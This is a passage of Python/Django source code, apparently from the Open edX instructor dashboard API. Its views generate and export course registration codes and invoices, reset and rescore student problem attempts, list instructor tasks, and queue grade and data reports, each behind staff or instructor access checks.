        instructor_task.api.submit_proctored_exam_results_report(request, course_key, query_features)
    except AlreadyRunningError:
        # The report task was already queued by an earlier request.
        status_response = _(
            "The proctored exam results report is currently being created."
            " To view the status of the report, see Pending Tasks below."
            " You will be able to download the report when it is complete."
        )
    else:
        status_response = _("The proctored exam results report is being created."
                            " To view the status of the report, see Pending Tasks below.")
    return JsonResponse({
        "status": status_response
    })
def save_registration_code(user, course_id, mode_slug, invoice=None, order=None, invoice_item=None):
    """
    Generate a unique code and save it in the Course Registration Table,
    retrying with a fresh code on any collision.

    Args:
        user (User): The user creating the course registration codes.
        course_id (str): The string representation of the course ID.
        mode_slug (str): The Course Mode Slug associated with any enrollment made by these codes.
        invoice (Invoice): (Optional) The associated invoice for this code.
        order (Order): (Optional) The associated order for this code.
        invoice_item (CourseRegistrationCodeInvoiceItem) : (Optional) The associated CourseRegistrationCodeInvoiceItem

    Returns:
        The newly created CourseRegistrationCode.
    """
    while True:
        code = random_code_generator()
        # Reject codes that clash with an active coupon code.
        if Coupon.objects.filter(code=code, is_active=True):
            continue
        new_code = CourseRegistrationCode(
            code=code,
            course_id=unicode(course_id),
            created_by=user,
            invoice=invoice,
            order=order,
            mode_slug=mode_slug,
            invoice_item=invoice_item
        )
        try:
            with transaction.atomic():
                new_code.save()
                return new_code
        except IntegrityError:
            # The code collided with an existing registration code; try again.
            continue
def registration_codes_csv(file_name, codes_list, csv_type=None):
    """
    Build a CSV HTTP response for the given registration codes.

    Arguments:
        file_name: download filename for the response.
        codes_list: registration code rows to export.
        csv_type: optional report flavor passed through to the feature extractor.
    """
    # CSV column order.
    query_features = [
        'code', 'redeem_code_url', 'course_id', 'company_name', 'created_by',
        'redeemed_by', 'invoice_id', 'purchaser', 'customer_reference_number', 'internal_reference', 'is_valid'
    ]
    code_rows = instructor_analytics.basic.course_registration_features(query_features, codes_list, csv_type)
    header, data_rows = instructor_analytics.csvs.format_dictlist(code_rows, query_features)
    return instructor_analytics.csvs.create_csv_response(file_name, header, data_rows)
def random_code_generator():
    """
    Produce a random alphanumeric code whose length comes from the
    REGISTRATION_CODE_LENGTH setting (default 8).
    """
    return generate_random_string(getattr(settings, 'REGISTRATION_CODE_LENGTH', 8))
@ensure_csrf_cookie
@cache_control(no_cache=True, no_store=True, must_revalidate=True)
@require_level('staff')
@require_POST
def get_registration_codes(request, course_id):
    """
    Respond with csv which contains a summary of all Registration Codes.

    Optionally filters by the posted 'download_company_name'; when the field
    is absent or empty, all codes for the course are returned.
    """
    course_id = SlashSeparatedCourseKey.from_deprecated_string(course_id)
    #filter all the course registration codes
    registration_codes = CourseRegistrationCode.objects.filter(
        course_id=course_id
    ).order_by('invoice_item__invoice__company_name')
    # Use .get() so a missing form field means "no filter" instead of an
    # unhandled MultiValueDictKeyError (HTTP 500).
    company_name = request.POST.get('download_company_name')
    if company_name:
        registration_codes = registration_codes.filter(invoice_item__invoice__company_name=company_name)
    csv_type = 'download'
    return registration_codes_csv("Registration_Codes.csv", registration_codes, csv_type)
@ensure_csrf_cookie
@cache_control(no_cache=True, no_store=True, must_revalidate=True)
@require_sales_admin
@require_POST
def generate_registration_codes(request, course_id):
    """
    Respond with csv which contains a summary of all Generated Codes.

    Flow: parse the posted invoice fields, create an Invoice plus its
    CourseRegistrationCodeInvoiceItem, generate the requested number of
    registration codes, email each recipient the invoice with CSV/PDF
    attachments, then return the codes themselves as a CSV download.
    """
    course_id = CourseKey.from_string(course_id)
    invoice_copy = False

    # convert the course registration code number into integer
    try:
        course_code_number = int(request.POST['total_registration_codes'])
    except ValueError:
        # Tolerate values posted as floats, e.g. "10.0".
        course_code_number = int(float(request.POST['total_registration_codes']))

    company_name = request.POST['company_name']
    company_contact_name = request.POST['company_contact_name']
    company_contact_email = request.POST['company_contact_email']
    unit_price = request.POST['unit_price']

    # Normalize the price to two decimal places, truncating (not rounding up).
    try:
        unit_price = (
            decimal.Decimal(unit_price)
        ).quantize(
            decimal.Decimal('.01'),
            rounding=decimal.ROUND_DOWN
        )
    except decimal.InvalidOperation:
        return HttpResponse(
            status=400,
            content=_(u"Could not parse amount as a decimal")
        )

    recipient_name = request.POST['recipient_name']
    recipient_email = request.POST['recipient_email']
    address_line_1 = request.POST['address_line_1']
    address_line_2 = request.POST['address_line_2']
    address_line_3 = request.POST['address_line_3']
    city = request.POST['city']
    state = request.POST['state']
    zip_code = request.POST['zip']
    country = request.POST['country']
    internal_reference = request.POST['internal_reference']
    customer_reference_number = request.POST['customer_reference_number']
    recipient_list = [recipient_email]
    if request.POST.get('invoice', False):
        # Requesting user asked for a copy of the invoice email.
        recipient_list.append(request.user.email)
        invoice_copy = True
    sale_price = unit_price * course_code_number
    # Remember the invoice-copy preference for next time.
    set_user_preference(request.user, INVOICE_KEY, invoice_copy)

    # Persist the invoice and its single registration-code line item.
    sale_invoice = Invoice.objects.create(
        total_amount=sale_price,
        company_name=company_name,
        company_contact_email=company_contact_email,
        company_contact_name=company_contact_name,
        course_id=course_id,
        recipient_name=recipient_name,
        recipient_email=recipient_email,
        address_line_1=address_line_1,
        address_line_2=address_line_2,
        address_line_3=address_line_3,
        city=city,
        state=state,
        zip=zip_code,
        country=country,
        internal_reference=internal_reference,
        customer_reference_number=customer_reference_number
    )

    invoice_item = CourseRegistrationCodeInvoiceItem.objects.create(
        invoice=sale_invoice,
        qty=course_code_number,
        unit_price=unit_price,
        course_id=course_id
    )

    course = get_course_by_id(course_id, depth=0)
    paid_modes = CourseMode.paid_modes_for_course(course_id)

    # Codes enroll into the course's paid mode, so exactly one must exist.
    if len(paid_modes) != 1:
        msg = (
            u"Generating Code Redeem Codes for Course '{course_id}', which must have a single paid course mode. "
            u"This is a configuration issue. Current course modes with payment options: {paid_modes}"
        ).format(course_id=course_id, paid_modes=paid_modes)
        log.error(msg)
        return HttpResponse(
            status=500,
            content=_(u"Unable to generate redeem codes because of course misconfiguration.")
        )

    course_mode = paid_modes[0]
    course_price = course_mode.min_price

    # Generate the requested number of unique registration codes.
    registration_codes = []
    for __ in range(course_code_number):
        generated_registration_code = save_registration_code(
            request.user, course_id, course_mode.slug, invoice=sale_invoice, order=None, invoice_item=invoice_item
        )
        registration_codes.append(generated_registration_code)

    site_name = microsite.get_value('SITE_NAME', 'localhost')
    quantity = course_code_number
    discount = (float(quantity * course_price) - float(sale_price))
    course_url = '{base_url}{course_about}'.format(
        base_url=microsite.get_value('SITE_NAME', settings.SITE_NAME),
        course_about=reverse('about_course', kwargs={'course_id': course_id.to_deprecated_string()})
    )
    dashboard_url = '{base_url}{dashboard}'.format(
        base_url=microsite.get_value('SITE_NAME', settings.SITE_NAME),
        dashboard=reverse('dashboard')
    )
    # PDF generation is best-effort: on failure attach a fallback note instead.
    try:
        pdf_file = sale_invoice.generate_pdf_invoice(course, course_price, int(quantity), float(sale_price))
    except Exception:  # pylint: disable=broad-except
        log.exception('Exception at creating pdf file.')
        pdf_file = None

    from_address = theming_helpers.get_value('email_from_address', settings.DEFAULT_FROM_EMAIL)
    # Template context shared by the email body and the invoice attachment.
    context = {
        'invoice': sale_invoice,
        'site_name': site_name,
        'course': course,
        'course_price': course_price,
        'sub_total': course_price * quantity,
        'discount': discount,
        'sale_price': sale_price,
        'quantity': quantity,
        'registration_codes': registration_codes,
        'currency_symbol': settings.PAID_COURSE_REGISTRATION_CURRENCY[1],
        'course_url': course_url,
        'platform_name': microsite.get_value('platform_name', settings.PLATFORM_NAME),
        'dashboard_url': dashboard_url,
        'contact_email': from_address,
        'corp_address': microsite.get_value('invoice_corp_address', settings.INVOICE_CORP_ADDRESS),
        'payment_instructions': microsite.get_value('invoice_payment_instructions', settings. INVOICE_PAYMENT_INSTRUCTIONS),
        'date': time.strftime("%m/%d/%Y")
    }
    # composes registration codes invoice email
    subject = u'Confirmation and Invoice for {course_name}'.format(course_name=course.display_name)
    message = render_to_string('emails/registration_codes_sale_email.txt', context)
    invoice_attachment = render_to_string('emails/registration_codes_sale_invoice_attachment.txt', context)

    #send_mail(subject, message, from_address, recipient_list, fail_silently=False)
    # Build one shared CSV of (code, redemption URL) attached to every email.
    csv_file = StringIO.StringIO()
    csv_writer = csv.writer(csv_file)
    for registration_code in registration_codes:
        full_redeem_code_url = 'http://{base_url}{redeem_code_url}'.format(
            base_url=microsite.get_value('SITE_NAME', settings.SITE_NAME),
            redeem_code_url=reverse('register_code_redemption', kwargs={'registration_code': registration_code.code})
        )
        csv_writer.writerow([registration_code.code, full_redeem_code_url])

    finance_email = microsite.get_value('finance_email', settings.FINANCE_EMAIL)
    if finance_email:
        # append the finance email into the recipient_list
        recipient_list.append(finance_email)

    # send a unique email for each recipient, don't put all email addresses in a single email
    for recipient in recipient_list:
        email = EmailMessage()
        email.subject = subject
        email.body = message
        email.from_email = from_address
        email.to = [recipient]
        email.attach(u'RegistrationCodes.csv', csv_file.getvalue(), 'text/csv')
        email.attach(u'Invoice.txt', invoice_attachment, 'text/plain')
        if pdf_file is not None:
            email.attach(u'Invoice.pdf', pdf_file.getvalue(), 'application/pdf')
        else:
            # PDF generation failed above; attach an apology note instead.
            file_buffer = StringIO.StringIO(_('pdf download unavailable right now, please contact support.'))
            email.attach(u'pdf_unavailable.txt', file_buffer.getvalue(), 'text/plain')
        email.send()

    return registration_codes_csv("Registration_Codes.csv", registration_codes)
@ensure_csrf_cookie
@cache_control(no_cache=True, no_store=True, must_revalidate=True)
@require_level('staff')
@require_POST
def active_registration_codes(request, course_id):
    """
    Respond with csv which contains a summary of all Active Registration Codes.

    Optionally filters by the posted 'active_company_name'; when the field is
    absent or empty, all active codes for the course are returned.
    """
    course_id = SlashSeparatedCourseKey.from_deprecated_string(course_id)
    # find all the registration codes in this course
    registration_codes_list = CourseRegistrationCode.objects.filter(
        course_id=course_id
    ).order_by('invoice_item__invoice__company_name')
    # Use .get() so a missing form field means "no filter" instead of an
    # unhandled MultiValueDictKeyError (HTTP 500).
    company_name = request.POST.get('active_company_name')
    if company_name:
        registration_codes_list = registration_codes_list.filter(invoice_item__invoice__company_name=company_name)
    # find the redeemed registration codes if any exist in the db
    code_redemption_set = RegistrationCodeRedemption.objects.select_related(
        'registration_code', 'registration_code__invoice_item__invoice'
    ).filter(registration_code__course_id=course_id)
    if code_redemption_set.exists():
        redeemed_registration_codes = [code.registration_code.code for code in code_redemption_set]
        # exclude the redeemed registration codes from the registration codes list and you will get
        # all the registration codes that are active
        registration_codes_list = registration_codes_list.exclude(code__in=redeemed_registration_codes)

    return registration_codes_csv("Active_Registration_Codes.csv", registration_codes_list)
@ensure_csrf_cookie
@cache_control(no_cache=True, no_store=True, must_revalidate=True)
@require_level('staff')
@require_POST
def spent_registration_codes(request, course_id):
    """
    Respond with csv which contains a summary of all Spent(used) Registration Codes.

    Optionally filters by the posted 'spent_company_name'; when the field is
    absent or empty, all spent codes for the course are returned.
    """
    course_id = SlashSeparatedCourseKey.from_deprecated_string(course_id)
    # find the redeemed registration codes if any exist in the db
    code_redemption_set = RegistrationCodeRedemption.objects.select_related('registration_code').filter(
        registration_code__course_id=course_id
    )
    spent_codes_list = []
    if code_redemption_set.exists():
        redeemed_registration_codes = [code.registration_code.code for code in code_redemption_set]
        # filter the Registration Codes by course id and the redeemed codes and
        # you will get a list of all the spent(Redeemed) Registration Codes
        spent_codes_list = CourseRegistrationCode.objects.filter(
            course_id=course_id, code__in=redeemed_registration_codes
        ).order_by('invoice_item__invoice__company_name').select_related('invoice_item__invoice')
        # Use .get() so a missing form field means "no filter" instead of an
        # unhandled MultiValueDictKeyError (HTTP 500).
        company_name = request.POST.get('spent_company_name')
        if company_name:
            spent_codes_list = spent_codes_list.filter(invoice_item__invoice__company_name=company_name)  # pylint: disable=maybe-no-member

    csv_type = 'spent'
    return registration_codes_csv("Spent_Registration_Codes.csv", spent_codes_list, csv_type)
@ensure_csrf_cookie
@cache_control(no_cache=True, no_store=True, must_revalidate=True)
@require_level('staff')
def get_anon_ids(request, course_id):  # pylint: disable=unused-argument
    """
    Respond with 2-column CSV output of user-id, anonymized-user-id
    """
    # TODO: the User.objects query and CSV generation here could be
    # centralized into instructor_analytics. Currently instructor_analytics
    # has similar functionality but not quite what's needed.
    course_id = SlashSeparatedCourseKey.from_deprecated_string(course_id)

    def build_csv_response(filename, header, rows):
        """Returns a CSV http response for the given header and rows (excel/utf-8)."""
        response = HttpResponse(content_type='text/csv')
        response['Content-Disposition'] = 'attachment; filename={0}'.format(unicode(filename).encode('utf-8'))
        writer = csv.writer(response, dialect='excel', quotechar='"', quoting=csv.QUOTE_ALL)
        # In practice, there should not be non-ascii data in this query,
        # but trying to do the right thing anyway.
        for output_row in [header] + rows:
            writer.writerow([unicode(cell).encode('utf-8') for cell in output_row])
        return response

    enrolled_students = User.objects.filter(
        courseenrollment__course_id=course_id,
    ).order_by('id')
    header = ['User ID', 'Anonymized User ID', 'Course Specific Anonymized User ID']
    rows = [
        [student.id, unique_id_for_user(student, save=False), anonymous_id_for_user(student, course_id, save=False)]
        for student in enrolled_students
    ]
    return build_csv_response(course_id.to_deprecated_string().replace('/', '-') + '-anon-ids.csv', header, rows)
@ensure_csrf_cookie
@cache_control(no_cache=True, no_store=True, must_revalidate=True)
@common_exceptions_400
@require_level('staff')
@require_query_params(
    unique_student_identifier="email or username of student for whom to get progress url"
)
def get_student_progress_url(request, course_id):
    """
    Get the progress url of a student.
    Limited to staff access.

    Takes query parameter unique_student_identifier and if the student exists
    returns e.g. {
        'progress_url': '/../...'
    }
    """
    course_id = SlashSeparatedCourseKey.from_deprecated_string(course_id)
    student = get_student_from_identifier(request.GET.get('unique_student_identifier'))
    progress_url = reverse(
        'student_progress',
        kwargs={'course_id': course_id.to_deprecated_string(), 'student_id': student.id}
    )
    return JsonResponse({
        'course_id': course_id.to_deprecated_string(),
        'progress_url': progress_url,
    })
@transaction.non_atomic_requests
@ensure_csrf_cookie
@cache_control(no_cache=True, no_store=True, must_revalidate=True)
@require_level('staff')
@require_query_params(
    problem_to_reset="problem urlname to reset"
)
@common_exceptions_400
def reset_student_attempts(request, course_id):
    """
    Resets a students attempts counter or starts a task to reset all students
    attempts counters. Optionally deletes student state for a problem. Limited
    to staff access. Some sub-methods limited to instructor access.

    Takes some of the following query parameters
        - problem_to_reset is a urlname of a problem
        - unique_student_identifier is an email or username
        - all_students is a boolean
            requires instructor access
            mutually exclusive with unique_student_identifier and delete_module
        - delete_module is a boolean
            requires instructor access
            mutually exclusive with all_students
    """
    course_id = SlashSeparatedCourseKey.from_deprecated_string(course_id)
    course = get_course_with_access(
        request.user, 'staff', course_id, depth=None
    )
    problem_to_reset = strip_if_string(request.GET.get('problem_to_reset'))
    student_identifier = request.GET.get('unique_student_identifier', None)
    student = None
    if student_identifier is not None:
        student = get_student_from_identifier(student_identifier)
    # Flags arrive as strings from the query string; accept "true"/"True"/True.
    all_students = request.GET.get('all_students', False) in ['true', 'True', True]
    delete_module = request.GET.get('delete_module', False) in ['true', 'True', True]

    # parameter combinations
    if all_students and student:
        return HttpResponseBadRequest(
            "all_students and unique_student_identifier are mutually exclusive."
        )
    if all_students and delete_module:
        return HttpResponseBadRequest(
            "all_students and delete_module are mutually exclusive."
        )

    # instructor authorization: bulk resets and state deletion need more than staff.
    if all_students or delete_module:
        if not has_access(request.user, 'instructor', course):
            return HttpResponseForbidden("Requires instructor access.")

    try:
        module_state_key = course_id.make_usage_key_from_deprecated_string(problem_to_reset)
    except InvalidKeyError:
        return HttpResponseBadRequest()

    response_payload = {}
    response_payload['problem_to_reset'] = problem_to_reset

    if student:
        # Single-student reset happens synchronously in this request.
        try:
            enrollment.reset_student_attempts(
                course_id,
                student,
                module_state_key,
                requesting_user=request.user,
                delete_module=delete_module
            )
        except StudentModule.DoesNotExist:
            return HttpResponseBadRequest(_("Module does not exist."))
        except sub_api.SubmissionError:
            # Trust the submissions API to log the error
            error_msg = _("An error occurred while deleting the score.")
            return HttpResponse(error_msg, status=500)
        response_payload['student'] = student_identifier
    elif all_students:
        # Course-wide reset is delegated to an asynchronous instructor task.
        instructor_task.api.submit_reset_problem_attempts_for_all_students(request, module_state_key)
        response_payload['task'] = 'created'
        response_payload['student'] = 'All Students'
    else:
        # Neither a student nor all_students was specified.
        return HttpResponseBadRequest()

    return JsonResponse(response_payload)
@transaction.non_atomic_requests
@ensure_csrf_cookie
@cache_control(no_cache=True, no_store=True, must_revalidate=True)
@require_level('staff')
@common_exceptions_400
def reset_student_attempts_for_entrance_exam(request, course_id):  # pylint: disable=invalid-name
    """
    Resets a students attempts counter or starts a task to reset all students
    attempts counters for entrance exam. Optionally deletes student state for
    entrance exam. Limited to staff access. Some sub-methods limited to instructor access.

    Query parameters:
    - unique_student_identifier is an email or username
    - all_students is a boolean
        requires instructor access
        mutually exclusive with delete_module
    - delete_module is a boolean
        requires instructor access
        mutually exclusive with all_students

    Returns JsonResponse on success; HTTP 400 for bad parameter combinations
    or a missing/invalid entrance exam; HTTP 403 when instructor access is
    required but absent.
    """
    course_id = SlashSeparatedCourseKey.from_deprecated_string(course_id)
    course = get_course_with_access(
        request.user, 'staff', course_id, depth=None
    )
    # A course with no entrance exam has nothing to reset.
    if not course.entrance_exam_id:
        return HttpResponseBadRequest(
            _("Course has no entrance exam section.")
        )
    student_identifier = request.GET.get('unique_student_identifier', None)
    student = None
    if student_identifier is not None:
        student = get_student_from_identifier(student_identifier)
    # Query-string booleans arrive as text; only explicit truthy forms count.
    all_students = request.GET.get('all_students', False) in ['true', 'True', True]
    delete_module = request.GET.get('delete_module', False) in ['true', 'True', True]
    # parameter combinations
    if all_students and student:
        return HttpResponseBadRequest(
            _("all_students and unique_student_identifier are mutually exclusive.")
        )
    if all_students and delete_module:
        return HttpResponseBadRequest(
            _("all_students and delete_module are mutually exclusive.")
        )
    # instructor authorization: bulk resets and state deletion need more than staff
    if all_students or delete_module:
        if not has_access(request.user, 'instructor', course):
            return HttpResponseForbidden(_("Requires instructor access."))
    try:
        entrance_exam_key = course_id.make_usage_key_from_deprecated_string(course.entrance_exam_id)
        if delete_module:
            instructor_task.api.submit_delete_entrance_exam_state_for_student(request, entrance_exam_key, student)
        else:
            instructor_task.api.submit_reset_problem_attempts_in_entrance_exam(request, entrance_exam_key, student)
    except InvalidKeyError:
        # entrance_exam_id was set but is not a parseable usage key.
        return HttpResponseBadRequest(_("Course has no valid entrance exam section."))
    response_payload = {'student': student_identifier or _('All Students'), 'task': 'created'}
    return JsonResponse(response_payload)
@transaction.non_atomic_requests
@ensure_csrf_cookie
@cache_control(no_cache=True, no_store=True, must_revalidate=True)
@require_level('instructor')
@require_query_params(problem_to_reset="problem urlname to reset")
@common_exceptions_400
def rescore_problem(request, course_id):
    """
    Starts a background process a students attempts counter. Optionally deletes student state for a problem.
    Limited to instructor access.

    Takes either of the following query paremeters
    - problem_to_reset is a urlname of a problem
    - unique_student_identifier is an email or username
    - all_students is a boolean

    all_students and unique_student_identifier cannot both be present.
    """
    course_id = SlashSeparatedCourseKey.from_deprecated_string(course_id)
    problem_to_reset = strip_if_string(request.GET.get('problem_to_reset'))
    student_identifier = request.GET.get('unique_student_identifier', None)
    student = None
    if student_identifier is not None:
        student = get_student_from_identifier(student_identifier)
    # Only explicit truthy text forms enable the all-students mode.
    all_students = request.GET.get('all_students') in ['true', 'True', True]
    # Exactly one target -- a single student or everyone -- must be chosen.
    if not (problem_to_reset and (all_students or student)):
        return HttpResponseBadRequest("Missing query parameters.")
    if all_students and student:
        return HttpResponseBadRequest(
            "Cannot rescore with all_students and unique_student_identifier."
        )
    try:
        module_state_key = course_id.make_usage_key_from_deprecated_string(problem_to_reset)
    except InvalidKeyError:
        return HttpResponseBadRequest("Unable to parse problem id")
    response_payload = {}
    response_payload['problem_to_reset'] = problem_to_reset
    if student:
        response_payload['student'] = student_identifier
        # Asynchronous rescore for a single student.
        instructor_task.api.submit_rescore_problem_for_student(request, module_state_key, student)
        response_payload['task'] = 'created'
    elif all_students:
        # Asynchronous rescore across the whole course.
        instructor_task.api.submit_rescore_problem_for_all_students(request, module_state_key)
        response_payload['task'] = 'created'
    else:
        # Unreachable given the validation above; kept as a safety net.
        return HttpResponseBadRequest()
    return JsonResponse(response_payload)
@transaction.non_atomic_requests
@ensure_csrf_cookie
@cache_control(no_cache=True, no_store=True, must_revalidate=True)
@require_level('instructor')
@common_exceptions_400
def rescore_entrance_exam(request, course_id):
    """
    Starts a background process a students attempts counter for entrance exam.
    Optionally deletes student state for a problem. Limited to instructor access.

    Takes either of the following query parameters
    - unique_student_identifier is an email or username
    - all_students is a boolean

    all_students and unique_student_identifier cannot both be present.
    """
    course_id = SlashSeparatedCourseKey.from_deprecated_string(course_id)
    course = get_course_with_access(
        request.user, 'staff', course_id, depth=None
    )
    student_identifier = request.GET.get('unique_student_identifier', None)
    student = None
    if student_identifier is not None:
        student = get_student_from_identifier(student_identifier)
    # Only explicit truthy text forms enable the all-students mode.
    all_students = request.GET.get('all_students') in ['true', 'True', True]
    if not course.entrance_exam_id:
        return HttpResponseBadRequest(
            _("Course has no entrance exam section.")
        )
    if all_students and student:
        return HttpResponseBadRequest(
            _("Cannot rescore with all_students and unique_student_identifier.")
        )
    try:
        entrance_exam_key = course_id.make_usage_key_from_deprecated_string(course.entrance_exam_id)
    except InvalidKeyError:
        return HttpResponseBadRequest(_("Course has no valid entrance exam section."))
    response_payload = {}
    if student:
        response_payload['student'] = student_identifier
    else:
        response_payload['student'] = _("All Students")
    # NOTE(review): `student` may be None here; presumably the task treats a
    # missing student as "rescore everyone" -- confirm against the task API.
    instructor_task.api.submit_rescore_entrance_exam_for_student(request, entrance_exam_key, student)
    response_payload['task'] = 'created'
    return JsonResponse(response_payload)
@ensure_csrf_cookie
@cache_control(no_cache=True, no_store=True, must_revalidate=True)
@require_level('staff')
def list_background_email_tasks(request, course_id):  # pylint: disable=unused-argument
    """
    Return a JSON listing of the bulk-email tasks run for this course.

    Only the history of the 'bulk_course_email' task type is reported.
    """
    course_key = SlashSeparatedCourseKey.from_deprecated_string(course_id)
    # Restrict the history lookup to the bulk-email task type.
    email_tasks = instructor_task.api.get_instructor_task_history(
        course_key, task_type='bulk_course_email'
    )
    return JsonResponse({
        'tasks': map(extract_task_features, email_tasks),
    })
@ensure_csrf_cookie
@cache_control(no_cache=True, no_store=True, must_revalidate=True)
@require_level('staff')
def list_email_content(request, course_id):  # pylint: disable=unused-argument
    """
    Return a JSON listing of the content of bulk emails sent for this course.
    """
    course_key = SlashSeparatedCourseKey.from_deprecated_string(course_id)
    # Bulk-email task rows are the records that carry sent email content.
    sent_emails = instructor_task.api.get_instructor_task_history(
        course_key, task_type='bulk_course_email'
    )
    return JsonResponse({
        'emails': map(extract_email_features, sent_emails),
    })
@ensure_csrf_cookie
@cache_control(no_cache=True, no_store=True, must_revalidate=True)
@require_level('staff')
def list_instructor_tasks(request, course_id):
    """
    List instructor tasks.

    Takes optional query paremeters.
    - With no arguments, lists running tasks.
    - `problem_location_str` lists task history for problem
    - `problem_location_str` and `unique_student_identifier` lists task
        history for problem AND student (intersection)
    """
    course_id = SlashSeparatedCourseKey.from_deprecated_string(course_id)
    problem_location_str = strip_if_string(request.GET.get('problem_location_str', False))
    student = request.GET.get('unique_student_identifier', None)
    if student is not None:
        student = get_student_from_identifier(student)
    # A student filter only makes sense when scoped to a problem.
    if student and not problem_location_str:
        return HttpResponseBadRequest(
            "unique_student_identifier must accompany problem_location_str"
        )
    if problem_location_str:
        try:
            module_state_key = course_id.make_usage_key_from_deprecated_string(problem_location_str)
        except InvalidKeyError:
            return HttpResponseBadRequest()
        if student:
            # Specifying for a single student's history on this problem
            tasks = instructor_task.api.get_instructor_task_history(course_id, module_state_key, student)
        else:
            # Specifying for single problem's history
            tasks = instructor_task.api.get_instructor_task_history(course_id, module_state_key)
    else:
        # If no problem or student, just get currently running tasks
        tasks = instructor_task.api.get_running_instructor_tasks(course_id)
    response_payload = {
        'tasks': map(extract_task_features, tasks),
    }
    return JsonResponse(response_payload)
@ensure_csrf_cookie
@cache_control(no_cache=True, no_store=True, must_revalidate=True)
@require_level('staff')
def list_entrance_exam_instructor_tasks(request, course_id):  # pylint: disable=invalid-name
    """
    Return a JSON listing of entrance-exam related instructor tasks.

    Optional query parameter `unique_student_identifier` (email or username)
    restricts the history to a single student.
    """
    course_key = SlashSeparatedCourseKey.from_deprecated_string(course_id)
    course = get_course_by_id(course_key)
    identifier = request.GET.get('unique_student_identifier', None)
    student = get_student_from_identifier(identifier) if identifier is not None else None
    try:
        entrance_exam_key = course_key.make_usage_key_from_deprecated_string(course.entrance_exam_id)
    except InvalidKeyError:
        return HttpResponseBadRequest(_("Course has no valid entrance exam section."))
    if student:
        # History limited to one student's entrance exam tasks.
        tasks = instructor_task.api.get_entrance_exam_instructor_task_history(course_key, entrance_exam_key, student)
    else:
        # History across all students.
        tasks = instructor_task.api.get_entrance_exam_instructor_task_history(course_key, entrance_exam_key)
    return JsonResponse({
        'tasks': map(extract_task_features, tasks),
    })
@ensure_csrf_cookie
@cache_control(no_cache=True, no_store=True, must_revalidate=True)
@require_level('staff')
def list_report_downloads(_request, course_id):
    """
    List grade CSV files that are available for download for this course.
    """
    course_key = SlashSeparatedCourseKey.from_deprecated_string(course_id)
    report_store = ReportStore.from_config(config_name='GRADES_DOWNLOAD')
    downloads = []
    for name, url in report_store.links_for(course_key):
        # Escape both the URL and the display name before embedding in HTML.
        downloads.append(dict(
            name=name,
            url=url,
            link=HTML('<a href="{}">{}</a>').format(HTML(url), Text(name)),
        ))
    return JsonResponse({'downloads': downloads})
@ensure_csrf_cookie
@cache_control(no_cache=True, no_store=True, must_revalidate=True)
@require_level('staff')
@require_finance_admin
def list_financial_report_downloads(_request, course_id):
    """
    List financial report CSV files that are available for download for this course.
    """
    course_key = SlashSeparatedCourseKey.from_deprecated_string(course_id)
    report_store = ReportStore.from_config(config_name='FINANCIAL_REPORTS')
    downloads = []
    for name, url in report_store.links_for(course_key):
        # Escape both the URL and the display name before embedding in HTML.
        downloads.append(dict(
            name=name,
            url=url,
            link=HTML('<a href="{}">{}</a>').format(HTML(url), Text(name)),
        ))
    return JsonResponse({'downloads': downloads})
@transaction.non_atomic_requests
@ensure_csrf_cookie
@cache_control(no_cache=True, no_store=True, must_revalidate=True)
@require_level('staff')
def export_ora2_data(request, course_id):
    """
    Pushes a Celery task which will aggregate ora2 responses for a course into a .csv
    """
    course_key = SlashSeparatedCourseKey.from_deprecated_string(course_id)
    try:
        instructor_task.api.submit_export_ora2_data(request, course_key)
    except AlreadyRunningError:
        # A report task for this course is already in flight; tell the user to wait.
        status = _(
            "An ORA data report generation task is already in "
            "progress. Check the 'Pending Tasks' table "
            "for the status of the task. When completed, the report "
            "will be available for download in the table below."
        )
    else:
        status = _("The ORA data report is being generated.")
    return JsonResponse({"status": status})
@transaction.non_atomic_requests
@ensure_csrf_cookie
@cache_control(no_cache=True, no_store=True, must_revalidate=True)
@require_level('staff')
def calculate_grades_csv(request, course_id):
    """
    Kick off the grade-report CSV task for this course.

    AlreadyRunningError is raised if the course's grades are already being updated.
    """
    course_key = SlashSeparatedCourseKey.from_deprecated_string(course_id)
    try:
        instructor_task.api.submit_calculate_grades_csv(request, course_key)
    except AlreadyRunningError:
        # Only one grade report task may run per course at a time.
        status = _("The grade report is currently being created."
                   " To view the status of the report, see Pending Tasks below."
                   " You will be able to download the report when it is complete.")
    else:
        status = _("The grade report is being created."
                   " To view the status of the report, see Pending Tasks below.")
    return JsonResponse({"status": status})
@transaction.non_atomic_requests
@ensure_csrf_cookie
@cache_control(no_cache=True, no_store=True, must_revalidate=True)
@require_level('staff')
def problem_grade_report(request, course_id):
    """
    Request a CSV showing students' grades for all problems in the
    course.

    AlreadyRunningError is raised if the course's grades are already being
    updated.
    """
    course_key = SlashSeparatedCourseKey.from_deprecated_string(course_id)
    try:
        instructor_task.api.submit_problem_grade_report(request, course_key)
    except AlreadyRunningError:
        # Only one problem grade report task may run per course at a time.
        status = _("A problem grade report is already being generated."
                   " To view the status of the report, see Pending Tasks below."
                   " You will be able to download the report when it is complete.")
    else:
        status = _("The problem grade report is being created."
                   " To view the status of the report, see Pending Tasks below.")
    return JsonResponse({"status": status})
@ensure_csrf_cookie
@cache_control(no_cache=True, no_store=True, must_revalidate=True)
@require_level('staff')
@require_query_params('rolename')
def list_forum_members(request, course_id):
    """
    Lists forum members of a certain rolename.
    Limited to staff access.

    The requesting user must be at least staff.
    Staff forum admins can access all roles EXCEPT for FORUM_ROLE_ADMINISTRATOR
        which is limited to instructors.

    Takes query parameter `rolename`.
    """
    course_id = SlashSeparatedCourseKey.from_deprecated_string(course_id)
    course = get_course_by_id(course_id)
    has_instructor_access = has_access(request.user, 'instructor', course)
    has_forum_admin = has_forum_access(
        request.user, course_id, FORUM_ROLE_ADMINISTRATOR
    )
    rolename = request.GET.get('rolename')
    # default roles require either (staff & forum admin) or (instructor)
    if not (has_forum_admin or has_instructor_access):
        return HttpResponseBadRequest(
            "Operation requires staff & forum admin or instructor access"
        )
    # EXCEPT FORUM_ROLE_ADMINISTRATOR requires (instructor)
    if rolename == FORUM_ROLE_ADMINISTRATOR and not has_instructor_access:
        return HttpResponseBadRequest("Operation requires instructor access.")
    # Reject any rolename outside the fixed set of supported forum roles.
    if rolename not in [FORUM_ROLE_ADMINISTRATOR, FORUM_ROLE_MODERATOR, FORUM_ROLE_COMMUNITY_TA]:
        return HttpResponseBadRequest(strip_tags(
            "Unrecognized rolename '{}'.".format(rolename)
        ))
    try:
        role = Role.objects.get(name=rolename, course_id=course_id)
        users = role.users.all().order_by('username')
    except Role.DoesNotExist:
        # No one has been assigned this role in this course yet.
        users = []
    def extract_user_info(user):
        """ Convert user to dict for json rendering. """
        return {
            'username': user.username,
            'email': user.email,
